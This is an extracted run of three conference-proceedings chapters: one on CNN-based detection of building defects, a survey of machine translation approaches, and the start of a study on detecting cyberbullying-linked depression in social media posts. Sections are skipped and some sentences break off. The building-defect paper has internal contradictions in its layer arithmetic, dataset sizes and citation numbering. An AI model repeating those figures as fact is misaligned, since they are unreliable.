might deteriorate in the future, and there are chances of defects like cracks and spalls.
This is the predominant issue that arises frequently that needs to be resolved. All the
constructed buildings are high-rise buildings; it would be very difficult to identify the
building defects manually which is a time-consuming process. So, to overcome this
problem, deep learning and machine learning image analysis algorithms have been
used where it will identify the type of building defect it refers to by analyzing the
image. A genetic algorithm and percolation model have been proposed by Qu et al.
[3, 4]. In this, the authors have worked on the model for the detection of cracks on
the concrete pavement beneath several noises. In [5], the Zernike moment operator
works behind the crack width detection approach. Here, dual-scale CNN has been
deployed for the detection of the crack’s width. A crack detection approach based on
the deep convolutional neural architecture has been suggested in [6] which combines
the multiscale and several levels of information about the target object.
In 2020, Qu et al. [7] crack detection has been done through the deployment of
the convolutional neural network. As the first step, the cracks have been classified
with the help of various deep learning models. Considering the low percentage of
effective concrete pavement crack images in the mass images that are composed with
the crack detection vehicle, modification is done on the output dimension before the
detection of the crack. The efficiency has been augmented by scaling the network
model horizontally, and also the convolution layer is accessed with the kernel size
of 1 × 1, 3 × 3. It is compared with the VGG16 network [8] and from which it has
been observed that it is not so capable enough as they used only cracks for detection.
An updated model of the VGG16 network has been proposed by the authors in the
present work. This model employs ResNet50 in which there are several network
layers. These layers are used to extract the features from images using CNN.
In ResNet [9], it is allowed to train the neural network layers about 152 layers.
There are about three models in ResNet, i.e., ResNet18, ResNet50, and ResNet152.
We implemented ResNet50 in our model and the detection is done. The main advan-
tage of using this model is that ResNet50 has a concept of using the skip connection
as illustrated in (Fig. 1) [10], where it skips the connection accurately and it is only
done before the ReLU activation function to acquire the better accuracy. We gener-
ally use two different blocks in ResNet50. If the input size is equal to the output size,
Detection of Building Defects Using Convolutional Neural Networks 841
then we use identity block, otherwise, convolution block is used. In the convolution
block, an extra convolution layer is added in the skip connection.
Figure 2 represents the architecture of ResNet50 [11], where it consists of four
stages of identity blocks. The input layer has a 7 × 7 filter size of such 64 filters with
a max pooling layer of 3 × 3 filter size of stride 2. In each stage of the identity block,
three layers are used. In stage 1, in the first layer, 64 filters with the filter size of 1 ×
1 have been deployed, in the second layer, we use 64 filters with the filter size of 3 ×
3, and in the third layer, 256 filters with the filter size of 1 × 1 are used. Stage 1 will
be done three times. So, here a total of nine layers has been obtained (3 layers × 3
times = 12). In stage 2, in the first layer, 128 filters with the filter size of 1 × 1, in the
second layer 128 filters with the filter size of 3 × 3, in the third layer 512 filters with
the filter size of 1 × 1 have been deployed. Stage 2 will be done four times. Here, a
total of 12 layers (3 layers × 4 times = 12) has been achieved. In stage 3, in the first
layer, 256 filters with the filter size of 1 × 1, in the second layer 256 filters with the
filter size of 3 × 3, in the third layer 1024 filters with the filter size of 1 × 1 have
been used. Stage 3 will be done six times. Therefore, a total of 18 layers (3 layers
× 6 times = 18) is the output. In stage 4, in the first layer, 512 filters with the filter
size of 1 × 1, in the second layer 512 filters with the filter size of 3 × 3, and in the
third layer, 2048 filters with the filter size of 1 × 1 have been implemented. Stage 4
will be done three times. Subsequently, we get a total of nine layers (3 layers × 3
times = 9). The output layer is fully connected. It uses max pooling and softmax as
842 D. S. S. Bhavani et al.
an activation function. So, the total layers used in architecture of ResNet50 are 1 +
9 + 12 + 18 + 9 + 1 = 50 layers.
The architecture of AlexNet:
AlexNet [12, 13] is one of the algorithms used to solve the problem of image clas-
sification. It consists of 60 million parameters. If the input size of an RGB image is
256 × 256, then all the images of the training and testing set would be an image size
of 256 × 256. The architecture of the AlexNet is shown in the figure.
From the architecture shown in Fig. 3, we can observe that AlexNet consists
of 1 softmax layer, 2 fully connected layers, 3 overlapping max pooling layers, 2
Detection of Building Defects Using Convolutional Neural Networks 843
Fig. 3 Architecture of
AlexNet
844 D. S. S. Bhavani et al.
normalization layers, and 5 convolutional layers. Each convolution layer of the same
image size has a different number of kernels. If we perceive the architecture, initially,
a convolution layer of stride = 4 with 96 kernels of size 11 × 11 has been used by
overlapping the max pooling layers of size 3 × 3 with stride = 2 which follows next.
Then, again a convolution layer of size 5 × 5 of 256 kernels with padding size =
2 has been done. It again follows the overlapping max pooling layer of stride = 2
with the image size of 3 × 3. Then, three convolution layers of 384 kernels of size 3
× 3 with padding size of 2 have connected directly to each other. Adjacent follows
an overlapping max pooling layer of size 3 × 3 with stride = 2. Now, about two
fully connected layers of 4096 units follow with an output layer, 1000-way softmax.
It gives the distribution of about 1000 class labels. Each convolution layer contains
the convolution filters along with a nonlinear activation function, i.e., ReLU [14].
After every convolution layer and the fully connected layer, ReLU is applied. Before
the two fully connected layers, dropout is applied. Dropout is a method introduced
by G. E. Hinton where a neuron will be dropped from a network so that it cannot
contribute either in the forward propagation or backward propagation. This increases
the number of iterations, and without dropout, our model would overfit significantly.
The input size of an image would be 227 × 227 × 3 due to padding. The accuracy
obtained through this AlexNet model is comparatively poor. Hence, this results in
deploying another model to improve the detection rate. The objective of the research
is to devise a model based on deep learning techniques to automate the maintenance
process. The major objective of this research therefore is set to investigate the novel
application of the deep learning method of convolutional neural networks (CNN)
in automating the condition assessment of buildings. The focus is to automate the
detection and localization of key defects arising from dampness in buildings from
images. This paper has been initiated with a brief overview of the related works that
have been focused on various techniques. The next section has been focused on the
scope of the work followed by the proposed methodology. Experimental analysis
and results have been discussed in the next session. The last section provides the
conclusion and future enhancement.
2 Literature Survey
CNN techniques are widely used for image processing and the objective of this
algorithm is to predict the various building defects.
Qu et al. [7] has proposed a model based on crack detection using CNN. He
used VGG16 for optimization of the model to extract the features of characteristics
of cracks. Qu et al. have developed the model based on cracks using the LeNet-5
network. Qu et al. mentioned that using this model, accurate identification of the
cracks of concrete pavements from various characteristics types of disturbances by
training the model has been done. The paper concluded that to upgrade the effective-
ness of detection of cracks Qu et al. would use the YOLO v3 series to improve the
rate of detection. But LeNet-5 is not so capable enough as they used only cracks for
Detection of Building Defects Using Convolutional Neural Networks 845
3 Scope of Work
The work has mainly focused on detecting the building defects and surveys have
been conducted related to it. Based on the literature survey, in an existing system,
846 D. S. S. Bhavani et al.
there are many models to detect the defect of the building. Many models have been
deployed to detect the defects of a building. Also, the existing approaches are not so
capable of detecting the defects. To detect the building defects, we have deployed
models based on AlexNet and ResNet50 which will detect accurately than the existing
approaches. The combination of the deep learning technique—CNN architecture and
image visualization technique ResNet50 has been implemented here to augment the
accuracy. This section provides information about the architecture of AlexNet.
4 Proposed Algorithm
The proposed system that is shown in Fig. 4 aims to detect the defects in a building
which will reduce the human manual checking. Whenever there is a defect, i.e., spall
or crack in the building, the human needs to capture the defect and send the images
from the place they live. It has been inferred from various works that the deployment
of CNN could solve the various issues in computer vision. The main advantage of the
deployment of CNN in this work is that the detection of cracks is easier without human
intervention. Among the architectures, we have applied ResNet50 to determine the
defect types. The proposed model is shown in Fig. 4.
Algorithm
Step 1—START.
Step 2—Select an image as input to the model.
Step 3—Image processing will be done by using different layers.
Step 3a—Initially import the package Sequential so that all the packages will be
sequentially imported.
Step 3b—Then, image processing will be done using the package Convolution2D
to extract the features of the image. Then, the activation function—ReLU is used to
activate the neurons.
Step 3c—In the next step, the image pooling will be done using the package
MaxPooling2D. Here, the feature map is generated when the image is pooled.
Step 3d—The generated feature map will be converted into the size 1-dimensional
using the package Flatten.
Step 4—The model will be added into the dense layer where three layers will be
present in it, i.e., input layer, hidden layer, output layer sequentially.
Step 5—Training and testing of the model by generating our data using the package
ImageDataGenerator.
Step 6—Compiling the model using an optimizer.
Step 7—Importing the package ResNet50.
Step 8—Again training and testing the model.
Step 9—Connecting our model to the Flask, to access the Web application.
Step 10—END.
4.1 Method
The significant feature of CNN is that it has the properties like dimensionality reduc-
tion and the reduction in parameters. Computation is decreased due to the sharing
of the parameter. Additionally, the learning that is acquired in one part of the image
is utilized in the other part of the image. Dimensionality reduction plays a vital role
in the reduction of the computation power. These are the reasons that contributed to
the deployment of CNN in detecting the defects in the building.
In this work, initially, the model processes the image by using the various functions
in Keras like Sequential, Dense, Convolution2D, MaxPooling2D, and Flatten. The
detailed role of each function is given below.
Sequential—This function allows the network layers sequentially from the input
image to the predicted output.
848 D. S. S. Bhavani et al.
5 Experimental Analysis
A. Implementation
In this work, Python on Jupyter Notebook and Spyder applications has been
implemented. HTML is used in the Spyder application to create a Web page using
Flask. In this model, evaluation is done on a separate set of 455 images in the training
dataset and 146 images in the test dataset. Initially, the AlexNet model is deployed
and evaluation is done. The confusion matrix obtained is shown in Fig. 7. From
Fig. 8, the classification report is used to determine the metrics such as precision,
recall, and F1-score.
Train loss vs validation loss and train accuracy versus validation accuracy are
shown in Fig. 9. From Fig. 9, it has been observed that the validation accuracy is less
than the training accuracy. There might be few reasons like the small validation set
and unbalanced dataset. As to improve the accuracy and reduce the loss, ResNet50
has been deployed. The evaluation test showed a consistent overall accuracy of 81%
(Fig. 10), and 90% of images were correctly classified.
In this model, initially, we have applied deep learning techniques and trained
our model. Then, we loaded this model in ResNet50 implementation and trained the
model again. Figure 10 shows accuracy when the ResNet50 model was implemented.
The model has also been evaluated based on the various performance metrics, such as
precision, recall, and F1-score. Figure 11 shows the metrics for the deployed model.
We saved our model and again we loaded it in the Flask implementation which is
used to develop a Web application.
Fig. 11 Metrics
5.1 Results
5.2 Discussion
This work serves the predominant issue faced by the clients. As the detection of
the defects in the building is a complicated task, detection has been done with the
852 D. S. S. Bhavani et al.
deployment of the deep learning algorithms. These defects occur mainly in high-
rise buildings, and the main defects were cracks, spalls, and flakes. These defects
were caused due to (1) the moisture problems of the environment such as wind,
temperature, and rain, (2) improper quality in the standards of building construction,
(3) walls showing discoloration like brown or a yellow tainted stain, (4) improper
ventilation may also lead to the building defects at walls, ceiling, floors, and roof,
and (5) damages in the foundation. Some examples of building defects are leaks
Detection of Building Defects Using Convolutional Neural Networks 853
This work mainly focused on the detection of types of defects in the building. Auto-
mated detection of cracks has been done through the deployment of ResNet50. This
classification problem takes images of size 224 × 224 × 3 as our dataset. In this
work, 555 images have been considered for training and 176 images for the test
dataset. The model has run on 25 epochs, and the accuracy recorded is 81% with
0.02 loss on the training set and 83% validation accuracy with 0.01 loss. The overall
performance of this work showed reliability and flexibility in the classification of
the type of defects. This work is mainly focused on the four defects, namely cracks,
flakes, spalls, and molds. This work has various limitations in the dataset since it
possesses only images with visible defects. Additionally, the type of images taken
for consideration could have various backgrounds, and the edges shall be made clear.
The model could be enhanced in such a way that it could be compatible in providing
good results.
References
1. Sànchez–Marrè, M., Cortés, U., Roda, R. I., Poch, M., & Lafuente, J. (2002, December
17). Learning and adaptation in wastewater treatment plants through case–based reasoning.
Retrieved January 31, 2021 from https://onlinelibrary.wiley.com/doi/abs/https://doi.org/10.
1111/0885-9507.00061
2. Borner, K. (Ed) .(1995). Modules for design support. Technical Report FABEL-Report No. 35.
GMD, Sankt Augustin, Germany
3. Penumadu, D., Agrawal, G., & Chameau, J. (1992, May 01). In J. Ghaboussi, J. H. Garrett Jr.
& X. Wu (Eds.), Discussion of knowledge-based modeling of material behavior with neural
networks (January, 1991, Vol. 117, No.1). Retrieved January 31 2021 from https://ascelibrary.
org/doi/abs/10.1061/%28ASCE%2907339399%281992%29118%3A5%281057.2%29
4. Qu, Z., Chen, Y.-X., Liu, L., Xie, Y., & Zhou, Q. (2019). The algorithm of concrete surface
crack detection based on the genetic programming and percolation model. IEEE Access, 7,
57592–57603.
5. Qu, Z., Chen, S.-Q., Liu, Y.-Q., & Liu, L. (2019). Eliminating lining seams in tunnel concrete
crack images via line segments’ translation and expansion. IEEE Access, 7, 30615–30627.
6. Ni, F. T., Zhang, J., & Chen, Z. Q. (2019, may) Zernike-moment measurement of thin-crack
width in images enabled by dual-scale deep learning. Computer-Aided Civil Information,
34(50), 367–384.
7. Liu, Y., Yao, J., Lu, X., Xie, R., & Li, L. (2019). DeepCrack: a deep hierarchical feature learning
architecture for crack segmentation. Neurocomputing, 338, 139–153.
8. Qu, Z., Mei, J., Liu, L., & Zhou, D. Y. (2020). Crack detection of concrete pavement with cross-
entropy loss function and improved VGG16 network model. IEEE Access, 8, 54564–54573.
9. Anwar, A. (2020, November 06). Difference between AlexNet, VGGNet, ResNet and Inception.
Retrieved November 22, 2020 from https://towardsdatascience.com/the-w3h-of-alexnet-vgg
net-resnet-and-inception-7baaaecccc96.
10. Dwivedi, P. (2019, March 27). Understanding and coding a ResNet in Keras. Retrieved
November 05 2020. from https://towardsdatascience.com/understanding-and-coding-a-resnet-
in-keras-446d7ff84d33
11. Lazar, D. (March 06). Building a ResNet in Keras. Retrieved November 05, 2020. from https://
towardsdatascience.com/building-a-resnet-in-keras-e8f1322a49ba
Detection of Building Defects Using Convolutional Neural Networks 855
12. Prabhu. (2018, March 15). CNN Architectures—LeNet, AlexNet, VGG, GoogLeNet and
ResNet. Retrieved November 05, 2020. from https://medium.com/@RaghavPrabhu/cnn-arc
hitectures-lenet-alexnet-vgg-googlenet-and-resnet-7c81c017b848
13. Li, F.-F., Johnson, J., & Yeung, S. (2017, May 02). CNN Architecture. Retrieved http://cs231n.
stanford.edu/slides/2017/cs231n_2017_lecture9.pdf
14. Brownlee, J. (2019). A gentle introduction to the rectified linear unit (relu). Machine learning
mastery. https://machinelearningmastery.com/rectified-linear-activation-function-fordeep-lea
rning-neuralordeep-learning-neural.
15. Sachan, A. (2019, September 17). Detailed guide to understand and implement ResNets.
Retrieved November 05, 2020 from https://cv-tricks.com/keras/understand-implement-resnets/
16. Perez, H., Tah, J. H., & Mosavi, A. (2019). Deep learning for detecting building defects using
convolutional neural networks. Sensors, 19(16), 3556.
17. Kong, Q., Allen, R. M., Kohler, M. D., Heaton, T. H., & Bunn, J. (2018). Structural health
monitoring of buildings using smartphone sensors. Seismological Research Letters, 89(2A),
594–602.
18. Zhu, J., Zhang, C., Qi, H., & Ziyue, Lu. (2019). Vision-based defects detection for bridges using
transfer learning and convolutional neural networks. Structure and Infrastructure Engineering,
16(7), 1037–1049.
19. Rosebrock, A. (2018, December 31). Keras Conv2D and convolutional layers. Retrieved
November 05, 2020. from https://www.pyimagesearch.com/2018/12/31/keras-conv2d-and-
convolutional-layers/
20. Zhong, B., Xing, X., Love, P., Wang, X., & Luo, H. (2019). Convolutional neural network: Deep
learning-based classification of building quality problems. Advanced Engineering Informatics,
40, 46–57.
Tools and Techniques for Machine
Translation
Abstract Machine translation has been a subject of exploration for last numerous
years. A ton of observable work has been done in this field. Machine translation
involved serious speculation some time before there were computers to apply to it.
This paper aims to present different approaches, techniques, and algorithms used
for machine translation. Challenges of ambiguity in machine translation are also
discussed. The paper also outlines success reported in different categories by various
approaches taken along with challenges faced.
1 Introduction
Language is a prodigy and a factor that joins various societies and a method of
communicating emotions and thoughts that individuals attempt to pass on. Transla-
tion assumes a critical job in moving social ideas between at least two dialects. There
are few boundaries or troubles that translators face in this procedure. We realize that
translation assumes a significant job in evacuating hindrance made by various soci-
eties and correspondence. Along these lines, translation is one of the basic keys and
sufficient route in moving society. A decent translator ought to at the same time know
about the social elements, perspectives, and convention so as to intentionally think
about the sequential requests, express importance, improvement of related controls,
recorded and strict foundation of the source text.
Machine translation has been attempted through multiple manners by linguistics.
The approaches can be appreciated from various angles like translation in terms of
technology, approaches adopted, techniques used, languages attempted to name a
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 857
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_69
858 A. S. Maurya et al.
few. Further, the translated text can be judged on the basis of various parameters,
discussed as below.
a. Translation speed—This is determined by the response time of the translated
text.
b. Digital content—This is determined by the quality of translated audio and video
text across different devices.
c. Cross-platform—This is determined by the adoptability of translation tech-
nology among different platforms across different medias.
d. Translation quality—This is determined by the quality of translation and
accuracy.
e. MT approaches—This is determined by the efficiency of approaches that can
be applied for quality translations.
f. Cost—This is determined by the cost incurred for translation between source
and target language.
The paper outlines different translation approaches in Sect. 2. Section 3 is weaved
around different tools developed for machine translation. Section 4 discusses algo-
rithms used for machine translation. Section 5 addresses the ambiguity issues in
machine translation.
Statistical machine translation (SMT) quality can be evaluated by the size of training
corpora and the resources used linguistic tool, dictionaries, etc. The quality of transla-
tion also depends on the language pair used. SMT comprises of major parts like dictio-
nary, training sets, decoding, and testing as shown in Fig. 3. The process has reported
eighty-seven percent of accuracy [2]. The open-source software Moses allows auto-
matic train translation model for any language pair and requires a collection of
translated text to do so.
In neural machine translation, source text has a set of specific features that is encoded
and other neural network decodes it. Each word depends on surrounding recurrent
neural network used to handle them as shown in Fig. 4. The network remembers
Tools and Techniques for Machine Translation 861
previous words. Neural machine translation has shown remarkable success in terms
of less word order mistakes [3–5], lexical and grammar mistake. Further open-source
ecosystem for neural machine translation and neural machine learning provides
implementation of deep learning framework [3, 4].
Phrase dependency tree bank (PDT) [6] has flat structures, and dependency is based
on semantics rather than syntactic functions that makes if different from binary
branching. Binary branching follows mainstream dependency analysis.
Automatic Post-editing tool [7] is proposed for automatic proposition of word
replacements for a machine translation output. This approach uses technique based
on bilingual word embedding. Further, the effectiveness of the tools is shown in terms
of two lexical errors: ‘not translated word’ and ‘incorrectly translated word.’
A partial dependency parser for Irish language is proposed, which uses Constraint
Grammar (CG) rules. The CG rules are used to annotate dependency relations and
grammatical functions in unrestricted Irish text. Chunks are performed using a
regular-expression grammar; they further operate on dependency tagged sentences.
The system that operates on F-score has further reported ninety-three percent on
development data and ninety-four percent on unseen test data, while the chunker
achieves F-score of ninety-seven percent on development data and ninety-three
percent on unseen test data. Chunking is performed using a regular-expression
grammar which operates on the dependency tagged sentences [8].
This paper proposes Extension of Sanskrit text to Universal Networking Language
expressions named as ‘SANSUNL’. The enhancement of POS tagging, Sanskrit
language processing and parsing was done. Further, 23 prefixes and 774 suffixes with
grammar rules of Sanskrit stemmer are used for stemming the Sanskrit sentence in
the proposed system. The efficiency of ninety-five percent evaluated on BLEU and
fluency score metrics was reported [9].
862 A. S. Maurya et al.
Machine translation is also attempted in terms of algorithms used it and has reported
a significant amount of success in the quality of translation as discussed below.
a. Error Analysis of SaHiT—A Statistical Sanskrit-Hindi Translator, proposed
for analyses error for Sanskrit to Hindi MTS that uses statistical approach. The
corpus was build and trained using MTHub platform. The error report generated
by MTHub system and during training of two phases BLEU forty-one percent
score was reported [15].
b. Machine translation system for the translation of English to Sanskrit Language
“EtranS”, proposed to improve quality of translation. Further, modules were
developed: (a) parse module—is responsible for parsing, i.e., after analysis
tokens are generated and grammatical and syntax analysis is done. (b) Gener-
ator module uses semantic information for mapping and on the basis of mapping
results were generated. The system reported accuracy of ninety percent for small,
large, and extra-large sentences [1].The system considers simple and compound
sentences.
Machine translation for the translation of English to Sanskrit language is proposed
in this paper. Here, the four modules are developed: lexical parser, semantic mapper,
translator, and composer. Lexical parser does POS tag information. Three different
rules are generated namely: equality rule, synonym rule, and antonym rule. After
parsing when tokens are generated and using dependency when relation between
token is found then tree is generated and mapping is done between English and
Sanskrit sentence [16].
The morphological analysis along with lexical analysis is reported. Rule format is
designed. Here, the root word and meaning of it is identified with the help of lexical
analyzer [17].
Parsing technique named as lexical functional grammar (LFG) for Sanskrit text.
LFG works on two basic types of syntactic representation: (a) constituent structure
and (b) functional structure are reported. LFG approach is used to bridge the gap
between Sanskrit and English as both the language representations are different. For
instance, English is subject-verb-object (SVO) and Sanskrit is subject-object-verb
(SOV). The objective is to develop a parsing technique. The system considers simple
sentences [18].
set data. Further, list is used for testing set data for disambiguation of ambiguous
words. Performance of the system is reported to be encouraging [29]. Hybrid training
method is used for better performance over supervised and unsupervised approach.
The algorithm further reported that unsupervised method gives sixty-three percent,
supervised method gives seventy-six percent, and hybrid method gives eighty percent
of accuracy. Therefore, it is concluded that accuracy is improved in hybrid approach
[30].
Naïve Bayesian method of supervised learning approach with high features is
reported. Here, forward sequential selection algorithm is used to choose the best set
of features. High accuracy is reported by using this method [31]. Novel context clus-
tering algorithm is presented in the Bayesian framework. This algorithm is based on
the similarities between context pairs. After that maximum entropy model is trained
to represent the probability distribution of context pair similarities based on hetero-
geneous, the approach has reported significant high performance in unsupervised
approaches and challenging the supervised WSD systems [32, 33].
6 Conclusion
Acknowledgements The authors would like to thank Council of Science & Technology, UP for
providing fund under Adhoc-Research Scheme/Transfer of Technology Scheme with the reference
no-CST/D 2475.
References
1. Bahadur, P., Jain, A. K., & Chauhan, D. S. (2012). “EtranS-A complete framework for english to
sanskrit machine translation. International Journal of Advanced Computer Science and Appli-
cations(IJACSA), Special Issue on Selected Papers from International Conference & Workshop
On Emerging Trends In Technology. https://doi.org/10.14569/SpecialIssue.2012.020107
866 A. S. Maurya et al.
2. Sreelekha, S., Bhattacharyya, P., & Malathi, D. (2018, January). Statistical versus rule-based
machine translation: A comparative study on Indian languages. In International Conference
on Intelligent Computing and Applications.
3. Ott, M., Edunov, S., Grangier∗, D., & Auli, M. (2018). Scaling neural machine translation.
arXiv:1806.00187v3 [cs.CL] 4 Sep 2018
4. Hoang, C. D. V., Koehn, P., Haffari, G., & Cohn, T. (2018). Iterative back-translation for neural
machine translation. In Proceedings of the 2nd Workshop on Neural Machine Translation and
Generation, Melbourne, Australia, July 20 (pp. 18–24). c 2018 Association for Computational
Linguistics.
5. Johnson, M., Schuster, M., Le, Q. V., Krikun, M., Wu, Y., Chen, Z., Thorat, N., Viégas, F.,
Wattenberg, M., Corrado, G., Hughes, M., & Dean, J. (2017) Google’s multilingual neural
machine translation system: Enabling zero-shot translation.
6. Cao, J.-X., Huang, D.-G., Wang, W., & Wang, S.-J. (2014). Dalian Ligong Daxue
Xuebao/Journal of Dalian University of Technology, 54(1), 91–99.
7. Inácio, M. L., & Caseli, H. (2020). Word embeddings at post-editing february 2020 compu-
tational processing of the Portuguese Language. In 14th International Conference, PROPOR
2020, Evora, Portugal, March 2–4, Proceedings.
8. Dhonnchadha, E. U., & Genabith, J. V. (2010). Partial dependency parsing for Irish centre
for language and communication studies. Trinity College, Dublin, Ireland. Centre for Next
Generation Localisation, Dublin City University, Glasnevin, Dublin
9. Sitender & Bawa, S. (2020). Sanskrit to universal networking language EnConverter system
based on deep learning and context-free grammar. Multimedia Systems Metrics.
10. López-Pereira, A. (2019, December). Neural machine translation and statistical machine
translation: Perception and productivity, Revista Tradumàtica.
11. Attri, S. H., Prasad, T. V., & Ramakrishna, G. (2020). Computer Science, 21(3). https://doi.org/
10.7494/csci.2020.21.3.3624 HiPHET: Hybrid approach for translating mixed code language
(Hinglish) to pure languages (Hindi and English).
12. Zhang, Y., & Liu, G. (2020). Paragraph-parallel based neural machine translation model
with hierarchical attention. In Zhang, Y., & Liu, G.* (Eds.), School of Cyber Science
and Engineering, Shanghai Jiao Tong University, Shanghai, Shanghai, 200240, China cici-
-q@sjtu.edu.cn, lgshen@sjtu.edu.cn, Journal Physics: Conference Series, 1453, 012006.
13. Sadler, D. A. L. (1992) Noun-modifying adjectives in HPSG, Department of Language
and Linguistics, University of Essex, Wivenhoe Park, Colchester, CO4 3SQ, UK
louisa@essex.ac.uk doug@essex.ac.uk
14. Klein, G., Kim, Y., Deng, Y., & Senellart, Rush, A. M. (2017). OpenNMT: open-source toolkit
for neural machine translation. arXiv: 1701.02810v2 [cs.CL] 6 Mar 2017
15. Pandey & Jha (2016). Error Analysis of SaHiT—A Statistical Sanskrit-Hindi Translator.
16. Barkade et al .(2010). English to Sanskrit Machine Translation Semantic Mapper.
17. Tapaswi & Jain .(2011). Morphological and lexical analysis of the Sanskrit sentences.
18. Tapaswi et al .(2012). Parsing Sanskrit sentences using lexical functional grammar.
19. Sekharaiah, K. C., Gopal, U., & Khan, M. A. M. (2006) Obstacles to machine translation
20. Tapaswi et al. (2011): Morphological and lexical analysis of the Sanskrit sentences
21. Borah, P. P., Talukdar, G., & Baruah, A. (2019). WSD for Assamese Language.
22. Singh, V. P., & Kumar, P. (2018). Naive Bayes classifier for word sense disambiguation of
Punjabi language.
23. Sheth, M., Popat, S., & Vyas, T. (2018). Word sense disambiguation for Indian Languages
24. Shashank, N. S., Kallimani, J. S. (2017). Word sense disambiguation of polysemy words in
Kannada language.
25. Zankhana, B., & Vaishnav (2017). Gujarati word sense disambiguation using genetic algorithm.
26. Sruthi Sankar, K. P., Raghu Raj, P. C., & Jayan, V. (2016). Unsupervised approach to word
sense disambiguation in Malayalam.
27. Pal, A. R., Saha, D., Naskar, S., & Sekhar, N. (2015). Dash, word sense disambiguation in
Bengali: A lemmatized system increases the accuracy of the result.
Tools and Techniques for Machine Translation 867
28. Anand Kumar, M., Rajendran, S., & Soman, K. P. (2014). Tamil word sense disambiguation
using support vector machines with rich features.
29. Parameswarappa, S., & Narayan, V. N. (2013). Kannada word sense disambiguation using
decision list.
30. Saktel, P., & Shrawankar, U. (2012). An improved approach for word ambiguity removal.
31. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features.
32. Niu, C., Li, W., Srihari, R. K., Li, H., & Crist, L. (2004). Context clustering for word sense
disambiguation based on modeling pairwise context similarities.
33. Le, N.-B., Dao, X.-Q., & Nguyen Thi, M.-T. (2021). In Design of Text and Voice Machine
Translation Tool for Presentations April 2021 Conference: 13th Asian Conference on Intelligent
Information and Database Systems. Phuket Thailand.
Cyberbullying-Mediated Depression
Detection in Social Media Using Machine
Learning
Abstract Mental distress is one of the most paramount causes of disability world-
wide. People using social media at an exponential rate becomes prey to cyberbullying
victimization, eventually leading to mental health problems. This study focused on
assessing the association of social media, cyberbullying, and mental depression via
the use of supervised learning techniques. In this work, learning techniques namely
support vector machines, random forests, Naïve Bayes, multilayer perceptron, convo-
lution neural network, and recurrent neural network have been applied on the data
(taken from Twitter and Reddit) for predicting cyberbullying-mediated depression
detection. Higher accuracy is observed with deep learning as compared to baseline
machine learning. Also, among the applied classical machine learning techniques,
random forests reported the highest accuracy.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 869
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_70
870 A. Kumar and N. Sachdeva
as losing a job, lack of friends, strict parents, online trolling, cyberbullying (CB),
or any other related issues. Even so, with the technological advancements, people
are spending more time on social media rather than spending quality time with
their friends/family members. People suffering from mental distress [2] and other
depressive disorders generally use social media (SM) (such as Twitter, Reddit, and
Facebook) to share personal experiences, vent out their feelings and hear from other
people who are having similar issues. It is mainly related with emotional stress/social
anxiety/depressive symptoms/suicidal ideation/suicidal attempts, etc. CB [3–5] is
a rising public health concern that has been allied with multiple serious negative
consequences including depression, anxiety, insomnia, etc. Observing mental distress
on SM could have a serious impact on public health issues but when combined with
CB victimization, the impact could be exacerbated. Motivated by this, in our paper,
we focused on observing signs of depression on SM (namely Twitter and Reddit)
using supervised learning techniques like support vector machines (SVM), Naïve
Bayesian (NB), random forests (RF), multilayer perceptron (MLP), recurrent neural
network (RNN), and convolutional neural network (CNN). Term frequency–inverse
document frequency (TF-IDF) and Word2Vec were used for feature selection for ML
techniques, whereas word embedding [4] has been used for word feature vectorization
for DL techniques. Hence, we felt a classification (binary: CB-mediated depression
and non-CB-mediated depression) can be effectively conducted via analyzing the
texts written by people on SM (real-time user-generated data) at risk of or suffering
from mental illnesses (particularly depression due to CB).
Thus, the main contributions of this research is given below:
• Implement supervised ML and DL techniques for comparative analysis of CB-
mediated depression and non-CB-mediated depression detection (NB, SVM,
MLP, RF using TF-IDF, Word2Vec & CNN, RNN, Conv-RNN using GloVe) using
accuracy, precision, and recall on the data obtained from SM namely Twitter and
Reddit.
The rest of the paper is organized as follows. Second section discusses in brief
about the related work followed by discussion on the application of supervised
learning for CB detetction, results discussion, finally followed by conclusion and
future work discussion in the last sections.
This section briefs about the studies related to mental distress owing to CB victim-
ization on SM. Cenat et al. [6] studied CB and its serious consequences on teenagers
(depression, anxiety, suicide, loneliness). Logistic regression was used for predicting
mental distress, low self-esteem, etc., using CB victimization. Results showed that
girls had higher prevalence of CB. Nandhini et al. [7] proposed a CB detection system
that identified and classified flaming, harassment, etc., using Levenshtein algorithm
and NB. Enhanced results were obtained for CB detection and classification using
Cyberbullying-Mediated Depression Detection … 871
information retrieval algorithm. Nandhini et al. [8] proposed a system with enhanced
accuracy to classify harassment, racism, flaming, and terrorism using fuzzy logics and
genetic algorithms on the data taken from Myspace and Formspring.com. Frommholz
et al. [9] proposed a framework for identification of cyberstalking and harassment
using ML techniques with good results. Radovic et al. [10] examined the role of
SM on adolescents for depression detection caused due to CB, etc., via conducting
interviews for content analysis. Torous et al. [11] conducted a review in order to
assess suicide preventions in the current times using smartphones, sensors, and ML
techniques. Viner et al. [2] studied the association of SM and mental distress and
their related consequences (CB, etc.) on young people of England through content
analysis via questionnaire scoring. Talpur et al. [12] proposed a framework with
improved accuracy for CB detection by using PMI and ML techniques, namely NB,
kNN, SVM, RF, etc.
This section discusses about the dataset used and the system architecture.
In our study, we catered topics related to depression owing to CB. We also explored
that various established datasets for depression are also available online. But those
datasets focused on the posts containing depression and mental distress caused due
to several reasons such as lack of job, family issues, monetary aspects, and birth
defects. This made us synthesize our own dataset that focused primarily on catering
mental depression caused due to CB. Hence, we collected data from Twitter and
Reddit using the word ‘depression or mental distress.’ We collected around 20,000
samples that were then preprocessed. Data preprocessing employed removal of any
NaN, blank lines, punctuations, numbers, extra spaces, and stop words. Stemming
was performed. This left us with 19,731 samples. After this, we have manually
annotated it in order to study the CB-indicative symptoms. Post this, we classified the
dataset into binary classes: CB-mediated depression (CBMD) and non-CB-mediated
depression (N-CBMD). However, from our non-synthetic dataset, we observed that
approximate 18% of the data contained CB-mediated depression that eventually
made our corpus skewed (imbalanced) (CBMD contained 3551 samples and N-
CBMD contained 16,180 samples). In our case, former category is the minority
class (having fewer samples) whereas the latter one is the majority class (having
higher samples). One way of solving the imbalanced-class problem is to change the
